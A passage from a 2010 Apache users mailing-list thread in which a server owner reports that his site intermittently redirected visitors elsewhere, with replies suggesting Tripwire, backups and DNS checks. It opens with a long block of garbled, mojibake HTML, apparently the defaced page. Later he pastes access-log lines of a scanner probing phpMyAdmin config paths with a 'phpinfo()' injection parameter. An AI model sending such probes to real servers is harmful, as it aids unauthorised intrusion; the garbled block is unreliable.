w t;">Ñâ=98 ">( uot;">âââÑÑ=8F e:10pt;font-family:Courier">$ ly:"Times New Roman"">â=94 pt;font-family:Courier">^ "Times New Roman"">Ñ t-family:Courier"> imes New Roman"">â=A2 mily:Courier">â=9A ot;Times New Roman"">âÐ=92 pt;font-family:Courier">K "Times New Roman"">Ð±Ð pt;font-family:Courier">! quot;Times New Roman"">ââ£Ñ ont-size:10pt;font-family:Courier">8 nt-family:"Times New Roman"">ÐÐ·â=91 yle=3D"font-size:10pt;font-family:Courier">WY e:10pt;font-family:"Times New Roman"">Ð¥Ð± yle=3D"font-size:10pt;font-family:Courier">SÂ n style=3D"font-size:10pt;font-family:"Times New Roman"">â=
¼ÐâÑ urier"> man"">â=80 r">p quot;">Ðµq pan>=
Ð· an style=3D"font-size:10pt;font-family:"Times New Roman"">Ð<=
/span>t e=3D"font-size:10pt;font-family:"Times New Roman"">ÑÐ span>P =3D"font-size:10pt;font-family:"Times New Roman"">Ð»Ð«=D1=
=940 style=3D"font-size:10pt;font-family:"Times New Roman"">Ñ=D0=
=9Eâ=99ha :&=
quot;V an"">ÑÐ³â=9E mily:Courier">i s New Roman"">â=96 y:Courier">Z@Â Y Times New Roman"">Ñâ Ð=95 :10pt;font-family:Courier">Y, ly:"Times New Roman"">Ð font-family:Courier">`- FE4 :"Times New Roman"">Ð® nt-family:Courier">a. t;Times New Roman"">Ñ mily:Courier"> New Roman"">Ð urier">v0 oman"">Ð¸ >Â ;Times New Roman"">Ð ily:Courier"> ^ New Roman"">Ð urier">dT oman"">ÑÑâ family:Courier">A es New Roman"">â ly:Courier">>t es New Roman"">â¨â¡â=98 ize:10pt;font-family:Courier">Â t-size:10pt;font-family:"Times New Roman"">Ð©Ðâ=A9=
Ð³âÑâ ily:Courier">W } s New Roman"">Ñ ourier">+ oman"">â=93 er"> fUX man"">ÐÑ rier">sÂ -w ly:"Times New Roman"">Ð² font-family:Courier">R F uot;Times New Roman"">â=91 nt-family:Courier">â=99 y:"Times New Roman"">Ðâ=95 ze:10pt;font-family:Courier">5 ily:"Times New Roman"">â=90 0pt;font-family:Courier">d :"Times New Roman"">âÐ§ââ=92 style=3D"font-size:10pt;font-family:Courier">

Â

Â

~ ot;">ÑY an>=
Ð²Ð¢ an>=
Ð°Y tlk >=D0=
°ÑÐ¾Ð=AD er">`â=9A- New Roman"">â=84 :Courier"> Roman"">â=BC rier">m an"">ÑÐâ=A0 mily:Courier"> . s New Roman"">â=88 y:Courier">Â Â
an"">â£Ð½âÐâ=A0 -size:10pt;font-family:Courier">{ -family:"Times New Roman"">Ñ 10pt;font-family:Courier">? :"Times New Roman"">Ñ nt-family:Courier">Â u t;font-family:"Times New Roman"">Ñ -size:10pt;font-family:Courier">4d -family:"Times New Roman"">ââ¤ =3D"font-size:10pt;font-family:Courier">J pt;font-family:"Times New Roman"">Ðâ=95 le=3D"font-size:10pt;font-family:Courier">. 10pt;font-family:"Times New Roman"">ÑâÑ=89<=
span style=3D"font-size:10pt;font-family:Courier">+rqy~ =3D"font-size:10pt;font-family:"Times New Roman"">ÐÑ=D1=
ââââ=84 ;font-family:Courier">mÂ 10pt;font-family:"Times New Roman"">â£Ð tyle=3D"font-size:10pt;font-family:Courier">*
35ez quot;">â=A9a=
;">âÐºÑÐ¿Ñ=85 nt-family:Courier">{ Times New Roman"">Ñ ly:Courier">#e New Roman"">Ñ rier">: an"">Ñ&=
gt;_ quot;">â´ÐÑ=8A y:Courier">xÂ 1Â°/ t;font-family:"Times New Roman"">Ð» -size:10pt;font-family:Courier">1xQ t-family:"Times New Roman"">Ñâ=95 font-size:10pt;font-family:Courier"> ont-family:"Times New Roman"">âÐ²Ð£Ð=B6<=
span style=3D"font-size:10pt;font-family:Courier">E nt-size:10pt;font-family:"Times New Roman"">Ð¤ yle=3D"font-size:10pt;font-family:Courier">,".` ont-size:10pt;font-family:"Times New Roman"">Ð½âÐ=
=B3\ style=3D"font-size:10pt;font-family:"Times New Roman"">â=91=
Ð½Ð¼a E&#=
39;Y quot;">ÐÐ¾Ð«ââ 10pt;font-family:Courier">

..Z ot;">Ñ n>=
Ð: an style=3D"font-size:10pt;font-family:"Times New Roman"">Ñ<=
/span>l. le=3D"font-size:10pt;font-family:"Times New Roman"">Ðâ=
=90{ style=3D"font-size:10pt;font-family:"Times New Roman"">â=82=
âÑÐ=BD er">` "">ÑR span> >Ð pan style=3D"font-size:10pt;font-family:"Times New Roman"">â=
Ð Â°K=
;">â=A9t an>=
â Ð¹Ñ=88 er">$hH man"">âââ=91 font-family:Courier">Â - 0pt;font-family:"Times New Roman"">Ð´âÐ=AA pan style=3D"font-size:10pt;font-family:Courier">,i nt-size:10pt;font-family:"Times New Roman"">âÐ=A2 >v font-size:10pt;font-family:"Times New Roman"">Ð style=3D"font-size:10pt;font-family:Courier"> Â¤ ont-size:10pt;font-family:"Times New Roman"">â=A1 n style=3D"font-size:10pt;font-family:Courier">"H =3D"font-size:10pt;font-family:"Times New Roman"">Ð¿Ñ pan>Â¤ tyle=3D"font-size:10pt;font-family:"Times New Roman"">Ð n>âÂ° L n>=
â=96W0 >=D0=
=9Dsc style=3D"font-size:10pt;font-family:"Times New Roman"">â=B4=
u R% style=3D"font-size:10pt;font-family:"Times New Roman"">Ñ pan>4 =3D"font-size:10pt;font-family:"Times New Roman"">â=AA >Yf "font-size:10pt;font-family:"Times New Roman"">â=9C pan style=3D"font-size:10pt;font-family:Courier">5 t-size:10pt;font-family:"Times New Roman"">â¬â=D0=
®Ð=A2,(+y an>=
Ñ: an style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=
Ð an style=3D"font-size:10pt;font-family:"Times New Roman"">Ñ<=
/span>% e=3D"font-size:10pt;font-family:"Times New Roman"">ââ=
Ñ]wR%1=
;">Ñâ¬Ð=95 urier">.r oman"">â=9E er"> "">Ñâ=96 rier">Â YRâ=99<}
;">â=88 an>=
Ñ an style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=
âÐ´â¥ urier">-q Roman"">â=96 ier">_ n"">â©â¬ :Courier">{2Y ew Roman"">ÑÑââ ze:10pt;font-family:Courier"> ily:"Times New Roman"">â´â¤ÑÑÐ >A+Q =3D"font-size:10pt;font-family:"Times New Roman"">ââ=96=
âÐ§ >Â° an"">â=90 ">{ uot;">ÐâÑÐ=9F family:Courier">

Â

w t;">Ð¨A >=E2=
¼â£âÑ ily:Courier">4R New Roman"">Ñ urier">s man"">â=A0 r">F quot;">Ð·â â£ mily:Courier">{ New Roman"">â=99 :Courier"> k w Roman"">âÐ¹Ñâ e:10pt;font-family:Courier">8 ly:"Times New Roman"">ââ t-size:10pt;font-family:Courier"> -family:"Times New Roman"">â â¢Ð«Ðâ=
=9C# style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=D0=
½ÐÑ=8F=
â=96~ o w Roman"">ââ£Ð«Ð¤Ð° nt-size:10pt;font-family:Courier"> &28

^ t;">â=AB@O}<=
/span> ">Ñ:<=
span style=3D"font-size:10pt;font-family:"Times New Roman"">=E2=
¨f -A=
=D0=
¿ÐµÐ=AA pan>Â Â Â Â Â 0pt;font-family:"Times New Roman"">Ð¦Ð =3D"font-size:10pt;font-family:Courier"> pt;font-family:"Times New Roman"">Ð®â=98 le=3D"font-size:10pt;font-family:Courier">k 10pt;font-family:"Times New Roman"">â=9A =3D"font-size:10pt;font-family:Courier"> pt;font-family:"Times New Roman"">Ð¿Ðâ=84 an style=3D"font-size:10pt;font-family:Courier">{ -size:10pt;font-family:"Times New Roman"">Ñ e=3D"font-size:10pt;font-family:Courier">Â· ize:10pt;font-family:"Times New Roman"">â=9C le=3D"font-size:10pt;font-family:Courier">/ 10pt;font-family:"Times New Roman"">â=96 =3D"font-size:10pt;font-family:Courier">U pt;font-family:"Times New Roman"">ÑÐ« =3D"font-size:10pt;font-family:Courier">q$a 10pt;font-family:"Times New Roman"">Ð¹Ðºâ=94<=
span style=3D"font-size:10pt;font-family:Courier">x nt-size:10pt;font-family:"Times New Roman"">ÐÑÑ pan>| =3D"font-size:10pt;font-family:"Times New Roman"">â=90 > 5Â 1=
;">â=84 an>=
Ð an style=3D"font-size:10pt;font-family:"Times New Roman"">Ð¯=
ÑÑÑ >|Â t;Times New Roman"">â=80 -family:Courier">w mes New Roman"">â=84 ily:Courier">o New Roman"">Ñ rier"> 4 man"">ÑÐ½ rier">c "">ï¿=BD es New Roman"">â=9F ly:Courier">? ew Roman"">â=9E ourier">dLM# w Roman"">Ð³ er">x "">â=96=
l t;">ââ ier">J n"">ââÐ° family:Courier">J es New Roman"">Ð« Courier">a

;">â=99v* pan>=
ÑÑ8x~v<=
/span> ">ÑÑÑ r">ow+v an"">â=A8 ">\ quot;">Ð pan>=
â=A5dJ! >Â New Roman"">â=82 :Courier">Â· s New Roman"">â=A0 y:Courier">_, ew Roman"">Ðªâ«Ð¨ÑÐ° -size:10pt;font-family:Courier"> family:"Times New Roman"">â=9A e:10pt;font-family:Courier">K ly:"Times New Roman"">ÑÐ¤ :10pt;font-family:Courier"> y:"Times New Roman"">Ð ont-family:Courier"> ;Times New Roman"">Ñ ily:Courier">* New Roman"">Ñ rier">Y an"">â¤â¢ y:Courier"> r ew Roman"">â¼Ð=BC mily:Courier">1 New Roman"">Ð¡ urier">4 man"">Ð=
8< "">â=97=
ka ot;">Ðâ=88 r">C quot;">ÐÑÐ§Ðââ«Ð³ =3D"font-size:10pt;font-family:Courier">G pt;font-family:"Times New Roman"">ÑÑâ¤â<=
/span>âÂ=B7&qu=
ot;O "">Ð§â=A4 rier"> an"">âÑ=97 ourier"> R_â=9AY ;Times New Roman"">Ð ily:Courier">.&
|Â ;Times New Roman"">ÐÐ¶ nt-family:Courier">tX ;Times New Roman"">Ð ily:Courier">HÂ° Times New Roman"">â¤â¤ pt;font-family:Courier">Â¤ ily:"Times New Roman"">ÐÐÐ nt-size:10pt;font-family:Courier">D t-family:"Times New Roman"">ââÐ style=3D"font-size:10pt;font-family:Courier"> ze:10pt;font-family:"Times New Roman"">Ñâ=95 n style=3D"font-size:10pt;font-family:Courier">r Â¤

Â

KV$ uot;">Ð§ >Â Â Â Â Â ;font-family:"Times New Roman"">âÐ¨Ð=BB style=3D"font-size:10pt;font-family:Courier">W ize:10pt;font-family:"Times New Roman"">Ð =3D"font-size:10pt;font-family:Courier">'8z ize:10pt;font-family:"Times New Roman"">âÐ â<=
/span> e=3D"font-size:10pt;font-family:"Times New Roman"">Ð<=
span style=3D"font-size:10pt;font-family:Courier">k nt-size:10pt;font-family:"Times New Roman"">â=9B style=3D"font-size:10pt;font-family:Courier">YEx -size:10pt;font-family:"Times New Roman"">âÑ=85<=
span style=3D"font-size:10pt;font-family:Courier">upDBR =3D"font-size:10pt;font-family:"Times New Roman"">Ð³Ð pan>4 =3D"font-size:10pt;font-family:"Times New Roman"">Ð³ pan style=3D"font-size:10pt;font-family:Courier">I t-size:10pt;font-family:"Times New Roman"">Ð¼Ñ an style=3D"font-size:10pt;font-family:Courier">42p$ ont-size:10pt;font-family:"Times New Roman"">â¢Ð=A3 n> "font-size:10pt;font-family:"Times New Roman"">ÐÐ > font-size:10pt;font-family:"Times New Roman"">Ñ style=3D"font-size:10pt;font-family:Courier">Â¤f ont-size:10pt;font-family:"Times New Roman"">â=A6 n style=3D"font-size:10pt;font-family:Courier"> >
;">Ð ?> pan>Â
an"">Ñ&=
#39;ci an"">Ð²â=AB ourier">i ar"">ï¿=BD imes New Roman"">ÐÐ¹Ð t;font-family:Courier">a uot;Times New Roman"">Ñ family:Courier"> ~ mes New Roman"">Ð :Courier">V w Roman"">Ð¢ er">M "">Ð0 span> >â©ââ¥â ont-family:Courier"> ** ot;Times New Roman"">Ñ amily:Courier">A s New Roman"">â=9E y:Courier"> w Roman"">Ð£â=91 ily:Courier"> #mgDS. Times New Roman"">Ñ ly:Courier">â=9A v ot;Times New Roman"">Ð¾ amily:Courier"> 2 es New Roman"">Ð±Ð· amily:Courier">X" t;Times New Roman"">Ð¬â¥ÐÐ° ont-size:10pt;font-family:Courier">N + font-family:"Times New Roman"">Ð±Ð font-size:10pt;font-family:Courier">>â=99 -size:10pt;font-family:"Times New Roman"">Ð±Ñ n style=3D"font-size:10pt;font-family:Courier">~ -size:10pt;font-family:"Times New Roman"">Ð e=3D"font-size:10pt;font-family:Courier">; 0pt;font-family:"Times New Roman"">Ñ nt-size:10pt;font-family:Courier">LÂ O =3D"font-size:10pt;font-family:"Times New Roman"">Ñ pan style=3D"font-size:10pt;font-family:Courier">> font-size:10pt;font-family:"Times New Roman"">Ð¡ style=3D"font-size:10pt;font-family:Courier">p ze:10pt;font-family:"Times New Roman"">âÐµÑÐ=
=908< pan style=3D"font-size:10pt;font-family:"Times New Roman"">Ð¼=
ÐÑÐ£â=A0 :Courier"> Roman"">â=97 rier"> an"">ÐÑ ier">n n"">Ñ|&=
lt; uot;">â¨Ð=B4 er">_ "">Ð£â=88 rier">w? man"">â§Ñ=8C Courier">:Y
â=99l- Roman"">Ð r"> quot;">Ð¸SF span> >â¡Ð=A8
fa,VW "">ÑÐ r">ZW "">Ð=C2=
=A4 uot;">Ð¬Ð >. ot;">ÑÐ¬=
Â°] an"">Ð¥ =
;">âÑÑÐâ ;font-family:Courier">

Â

;">Ð±Ð¸â=9D urier">9 man"">ÑÐ¹ rier">+ an"">â ">BÂ
A& New Roman"">â=94 Courier">- Roman"">Ð§ ">n uot;">Ð´UX pan>=
â=92uu n>=
Ð²F pan style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=
)Od style=3D"font-size:10pt;font-family:"Times New Roman"">Ñ an>

n"">Ñ b=
6 t;">Ð© >=D0=
=A5kBy n style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=
ÐV! pan style=3D"font-size:10pt;font-family:"Times New Roman"">â=
Ð=A4' pan>=
â=A0!D >=E2=
U an style=3D"font-size:10pt;font-family:"Times New Roman"">Ð¡<=
/span>LA yle=3D"font-size:10pt;font-family:"Times New Roman"">âÐ=
=A5/% style=3D"font-size:10pt;font-family:"Times New Roman"">Ð=D1=
Ñ=87(d >=E2=
âÐ=9B er">x6 n"">Ñ;<=
/span> ">ÐÐ§Ðº r">H quot;">Ð¹ s span> >â=A3Ozn an>=
Ðâ=9CH<=
/span> ">Ð£ÐÑ r"> quot;">âªâ¤ ourier">L S Roman"">ÐÐ Courier">(Â Â Â Â Â "font-size:10pt;font-family:"Times New Roman"">Ð¼Ð¼ >& =3D"font-size:10pt;font-family:"Times New Roman"">â=97 >Z3NvJ =3D"font-size:10pt;font-family:"Times New Roman"">â=A3 >p "font-size:10pt;font-family:"Times New Roman"">Ñ style=3D"font-size:10pt;font-family:Courier">h ize:10pt;font-family:"Times New Roman"">â=96 le=3D"font-size:10pt;font-family:Courier">w 10pt;font-family:"Times New Roman"">â =3D"font-size:10pt;font-family:Courier">] 0pt;font-family:"Times New Roman"">â=A6
im">

Â imes New Roman"">Ð¡ââ´ ze:10pt;font-family:Courier">â=96 font-family:"Times New Roman"">â=90 t-size:10pt;font-family:Courier">Â i t;font-family:"Times New Roman"">ÑÑÐ tyle=3D"font-size:10pt;font-family:Courier">m 4 ize:10pt;font-family:"Times New Roman"">â=80 le=3D"font-size:10pt;font-family:Courier">7 10pt;font-family:"Times New Roman"">Ñ ont-size:10pt;font-family:Courier">b nt-family:"Times New Roman"">Ðµ e:10pt;font-family:Courier">zq ily:"Times New Roman"">â=91 0pt;font-family:Courier">h "Times New Roman"">ÐÐ¤Ðâ¤â an style=3D"font-size:10pt;font-family:Courier">N& "font-size:10pt;font-family:"Times New Roman"">â=94 pan style=3D"font-size:10pt;font-family:Courier">-

Â *X;T ot;Times New Roman"">ÑÐÐ¡ :10pt;font-family:Courier">D y:"Times New Roman"">Ñ ont-family:Courier">{. t;Times New Roman"">â=A3 -family:Courier">X mes New Roman"">âÐ¶Ð=9A 0pt;font-family:Courier">Y "Times New Roman"">âÑ=80 :10pt;font-family:Courier"> nbgl amily:"Times New Roman"">â¦â font-size:10pt;font-family:Courier">E ont-family:"Times New Roman"">â=82 -size:10pt;font-family:Courier">$S t-family:"Times New Roman"">Ð£âÐÑ=80 an style=3D"font-size:10pt;font-family:Courier"> qÂ Â Â =
Â Â K# t;Times New Roman"">Ð mily:Courier">3F s New Roman"">Ð± ourier">: oman"">â=9A er">Â·1Â mily:"Times New Roman"">Ð t;font-family:Courier"> uot;Times New Roman"">Ñ family:Courier">q es New Roman"">Ð¾ Courier">] Roman"">Ðâ=88 y:Courier">r w Roman"">Ð er"> n: an"">âÐâ¨ -family:Courier"> mes New Roman"">Ð«âÐ=95 0pt;font-family:Courier">; "Times New Roman"">Ð t-family:Courier">z imes New Roman"">â=A6 mily:Courier">0 New Roman"">ââ© nt-family:Courier">5 Times New Roman"">Ð¡â¤Ðâ¤ font-size:10pt;font-family:Courier">R ont-family:"Times New Roman"">â=9C -size:10pt;font-family:Courier">Â Â Â Â Â > t;">Ð«r

;">âÐ=AF >yy4 quot;">â=82 =
;">â><=
/span> ">âÐÐ=9D rier">) an"">â=9F ">{ uot;">ÐÐ© >( ot;">Ñ4 n>=
ââ¨ >Â Â :"Times New Roman"">Ñ nt-family:Courier"> Times New Roman"">â=A0 amily:Courier"> s New Roman"">Ð£ ourier"> | Roman"">Ð ">Y8Â°y Roman"">â=96 rier">z an"">Ðâ=80 ourier">@$D sâ=96 t;Times New Roman"">âÐ=B9 t;font-family:Courier">b uot;Times New Roman"">âÐ=B6 0pt;font-family:Courier">1 "Times New Roman"">ÐÐ¿Ñââ¦Ð an>Pq_â=99 pan style=3D"font-size:10pt;font-family:"Times New Roman"">Ð£=
Ð½8q <=
span style=3D"font-size:10pt;font-family:"Times New Roman"">=E2=
j pan style=3D"font-size:10pt;font-family:"Times New Roman"">â=
â¢B an>=
â=91=
Â New Roman"">â¡Ñ=8C amily:Courier">< Times New Roman"">âªÑ=8D font-family:Courier">* t;Times New Roman"">Ð«ÐÐ 10pt;font-family:Courier">e y:"Times New Roman"">Ð ont-family:Courier">kT| ot;Times New Roman"">âÑ=8D pt;font-family:Courier"> - "Times New Roman"">Ð t-family:"Menlo Regular"">ï¿=BD e:10pt;font-family:"Times New Roman"">â=B4 =3D"font-size:10pt;font-family:Courier">Z 0pt;font-family:"Times New Roman"">ââ«â â=
=3D 4 >=E2=
Q an style=3D"font-size:10pt;font-family:"Times New Roman"">â=
â@ an>=
Ðâ=98 <=
/span> ">âÐ=AE=
" n"">ÐÐâ=BC ily:Courier">Lx New Roman"">Ð¦ urier">A man"">âªÐµâÐ½ pt;font-family:Courier"> quot;Times New Roman"">ÑÐ¼Ð ze:10pt;font-family:Courier">Y mily:"Times New Roman"">Ñ t;font-family:Courier">J uot;Times New Roman"">Ñâ¢ÐªÐâ style=3D"font-size:10pt;font-family:Courier"> ize:10pt;font-family:"Times New Roman"">ââ¥Ñ=
â=9BÂ° span> >Ð¼ÑÐÑâ¥â 10pt;font-family:Courier">>nG~CH(d" 10pt;font-family:"Times New Roman"">âÐ=93 tyle=3D"font-size:10pt;font-family:Courier">c e:10pt;font-family:"Times New Roman"">ÐÐ Ðµ pan style=3D"font-size:10pt;font-family:Courier">Â¤â=96 a=C2=
=A0 Roman"">ââ amily:Courier">Â 69 ont-family:"Times New Roman"">â=96 -size:10pt;font-family:Courier"> Â t;font-family:"Times New Roman"">Ð -size:10pt;font-family:Courier">oX;w nt-family:"Times New Roman"">Ñ e:10pt;font-family:Courier"> ly:"Times New Roman"">Ñ font-family:Courier">l t;Times New Roman"">Ñâ=A1 t;font-family:Courier">sÂ Â
Y man"">Ð=
L t;">Ð¨@=
Â Â
an"">â=97 "> â=9ACÂ Z Times New Roman"">Ñ ly:Courier"> ew Roman"">Ñ ier">"Â° es New Roman"">ÐÐ amily:Courier">Pc es New Roman"">Ð§ Courier">a)g w Roman"">Ð£ er">e "">ÑÐ´ r">4NH n"">â=90 >Â / t;Times New Roman"">â=90 -family:Courier">!c imes New Roman"">Ð¡ÐÐµÐ â=A4 =3D"font-size:10pt;font-family:Courier"> pt;font-family:"Times New Roman"">Ð¹âÐ³Ð=A4 an>C =3D"font-size:10pt;font-family:"Times New Roman"">Ñ pan style=3D"font-size:10pt;font-family:Courier"> .9+ font-size:10pt;font-family:"Times New Roman"">ÑÐ«â=
âª >Â Â Â Â Â ;font-family:"Times New Roman"">Ñ size:10pt;font-family:Courier">5X -family:"Times New Roman"">Ñ 10pt;font-family:Courier">
6< "">Ñââ¼ amily:"Menlo Regular"">ï¿=BD 0pt;font-family:"Times New Roman"">Ðª nt-size:10pt;font-family:Courier">$ t-family:"Times New Roman"">â¨Ñâ¥âÐ=
Ð¡Ðâ¥ urier"> â=96u mes New Roman"">â=9E ily:Courier">a New Roman"">Ð rier">t an"">ÐÐ¥ ier">^ n"">ÐW?=
K t;">Ñâ=96 ">2 quot;">Ð¹Ð¼Ð£Ñâ=93 t;font-family:Courier">4 uot;Times New Roman"">Ð family:Courier"> E

=3D=
=================3D

The address indicated in the begining of the page code leads to some chines=
e
server.
;font-family:Times">
=3D"font-size:10pt;font-family:Times">
So, somehow it happened that the output of the apache server was substitute=
d by
this page, which redirected visitors to some chinese server. tyle=3D"font-size:10pt;font-family:Times">It is the second
time I am posting to the mailing list, the first time the mailing list
virus scanner identified the content as having the Troj/Fujif-Gen
virus, thus, this time I removed active links from the message body so
it is not exactly what I received).

tyle=3D"font-size:10pt;font-family:Times">

But the most strange thing was that the problem dissapeared itself! So, it =
last
for 10 minutes then disappeared! And the again started and again dissapeare=
d.
Finally, I turned down apache untill I understand what is going on...

Any idea how could that happen?Â How to reproduce this? How to prevent=
?

Where to look for logs? I have check both ssh logs and apache logs, there i=
s
nothing that could seem unusual there...

Any help is appreciated.

Oleg.

--0016361e89b053d4340483605739--

Re: Someone hacked my apache2 server

am 04.04.2010 05:46:58 von Morgan Gangwere

On 4/3/2010 8:55 PM, Gil Vidals wrote:
> Oleg,
>
> What kind of web application firewall (WAF) are you running on your web
> servers? If the answer is "none", then you will have many problems with
> malware and hackers. You must have proper security. Google
> "mod_security" or hire a web security guy to take care of your servers
> for you.
Excuse me?
Props for the blatant plug but why would you ever say that a firewall is
//absolutely// needed? By all counts, any modern machine should be
Deny-By-Default, and security is something that must be implemented
along the application's terms.

What it appears here is that someone took advantage of a buffer overflow
somewhere

What needs to be asked are:
a) What OS is this running:
[ ] Windows [ ] Linux [ ] OSX/Darwin [ ] *BSD
b) What services are running:
[x] httpd - apache
[x] sshd - Tell me its OpenSSH v2+...
[ ] ftpd = If so, which one?
[ ] mail
[ ] other
c) What was this server running?
A corperate Intranet? Wordpress? Nothing in particular?

As for the content of the data, it looks like its Big5 encoded...
Possibly a message from someone?
Most common values are:
0xD0 0x20 0x95 0xD1 0xE2

Definitely looks big5 encoded, however I dont know for sure.

In any direction, I'd look into at one point installing Tripwire -- And
a good backup system if you dont have one already (can YOU degauss your
main disk?)
--
Morgan Gangwere

>> Why?
> Because it breaks the logical flow of conversation, plus makes
messages unreadable.
>>> Top-Posting is evil.

------------------------------------------------------------ ---------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: Someone hacked my apache2 server

am 04.04.2010 08:20:41 von Lester Caine

Oleg Goryunov wrote:
>
> Any help is appreciated.

Oleg - Does YOUR copy of the index page look OK reading it as a file?
What no one has mentioned is that DNC servers have been hacked and could be
doing the re-routing. It may not be YOUR site which is compromised.

I can view my own sites 'locally' without going through the internet, any chance
you can check via that route?

If the site itself looks OK, then check the config files for apache are still
actually looking at that site, but I suspect that because you say it is
intermittent it may well be outside you control. We have had a number of sites
giving us a 'problem', but when accessed with the IP address of the machine
direct then they are actually fine!

--
Lester Caine - G8HFL
-----------------------------
Contact - http://lsces.co.uk/wiki/?page=contact
L.S.Caine Electronic Services - http://lsces.co.uk
EnquirySolve - http://enquirysolve.com/
Model Engineers Digital Workshop - http://medw.co.uk//
Firebird - http://www.firebirdsql.org/index.php

------------------------------------------------------------ ---------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: Someone hacked my apache2 server

am 04.04.2010 10:42:58 von Oleg Goryunov

--0015174bf05c3c57ab048365347a
Content-Type: text/plain; charset=ISO-8859-1

Morgan
I did not have Tripwire installed. Will do that :) The problem is that I
can't find the files that were modified. As I indicated in the initial
email, the hackers page started to show up at some point, then STOPPED,
then, in 20 minutes started again, nd then stopped again. After that I shut
down apache. So, I am even clueless where to search for the logs.

The only thing that is relevant to the attach is this:

mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:17 -0500] "GET
//phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE 6.
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:18 -0500] "GET
//pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Wind
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:19 -0500] "GET
//admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Wi
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:20 -0500] "GET
//dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE 6.0;
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:20 -0500] "GET
//mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Wi
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:21 -0500] "GET
//php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:22 -0500] "GET
//myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE 6.0;
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:22 -0500] "GET
//PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE 6.
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:23 -0500] "GET
//phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE 6.
mysite.com:80 218.8.251.187 - - [02/Apr/2010:13:44:24 -0500] "GET
//p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 675 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Wi

So, I suspect that the vulnerablity might have been in the phpmyadmin. Could
it be there? Or is the chaler was trying to find the most common ways to get
in?

Oleg.

On Sun, Apr 4, 2010 at 3:28 AM, Morgan Gangwere <0.fractalus@gmail.com>wrote:

> On 4/3/2010 4:24 PM, Oleg Goryunov wrote:
>
>>
>> THe problem is that I do not see any files changed on the server (and
>> thus cannot check the owner of them). Where should I look for the
>> possible evidence of someone else being there?
>>
>
> Do you have Tripwire installed?
> If so, just look at its logs :)
>
> Otherwise, I'd look carefully at the dates that things were modified. you
> *do* have backups, right?
>
> --
> Morgan Gangwere
>
> >> Why?
> > Because it breaks the logical flow of conversation, plus makes messages
> unreadable.
> >>> Top-Posting is evil.
>
>
> ------------------------------------------------------------ ---------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>

--0015174bf05c3c57ab048365347a
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Morgan
I did not have Tripwire installed. Will do that :) The problem is=
that I can't find the files that were modified. As I indicated in the =
initial email, the hackers page=A0 started to show up at some point, then S=
TOPPED, then, in 20 minutes started again, nd then stopped again. After tha=
t I shut down apache. So, I am even clueless where to search for the logs. =

The only thing that is relevant to the attach is this:

=3D"http://mysite.com:80">mysite.com:80 218.8.251.187 - - [02/Apr/2010:=
13:44:17 -0500] "GET //phpmyadmin/config/config.inc.php?p=3Dphpinfo();=
HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible; MSIE 6=
..

218.8.251.187 - - [02/Ap=
r/2010:13:44:18 -0500] "GET //pma/config/config.inc.php?p=3Dphpinfo();=
HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible; MSIE 6=
..0; Wind

218.8.251.187 - - [02/Ap=
r/2010:13:44:19 -0500] "GET //admin/config/config.inc.php?p=3Dphpinfo(=
); HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible; MSIE=
6.0; Wi

218.8.251.187 - - [02/Ap=
r/2010:13:44:20 -0500] "GET //dbadmin/config/config.inc.php?p=3Dphpinf=
o(); HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible; MS=
IE 6.0;

218.8.251.187 - - [02/Ap=
r/2010:13:44:20 -0500] "GET //mysql/config/config.inc.php?p=3Dphpinfo(=
); HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatible; MSIE=
6.0; Wi

218.8.251.187 - - [02/Ap=
r/2010:13:44:21 -0500] "GET //php-my-admin/config/config.inc.php?p=3Dp=
hpinfo(); HTTP/1.1" 404 675 "-" "Mozilla/4.0 (compatibl=
e; MSIE

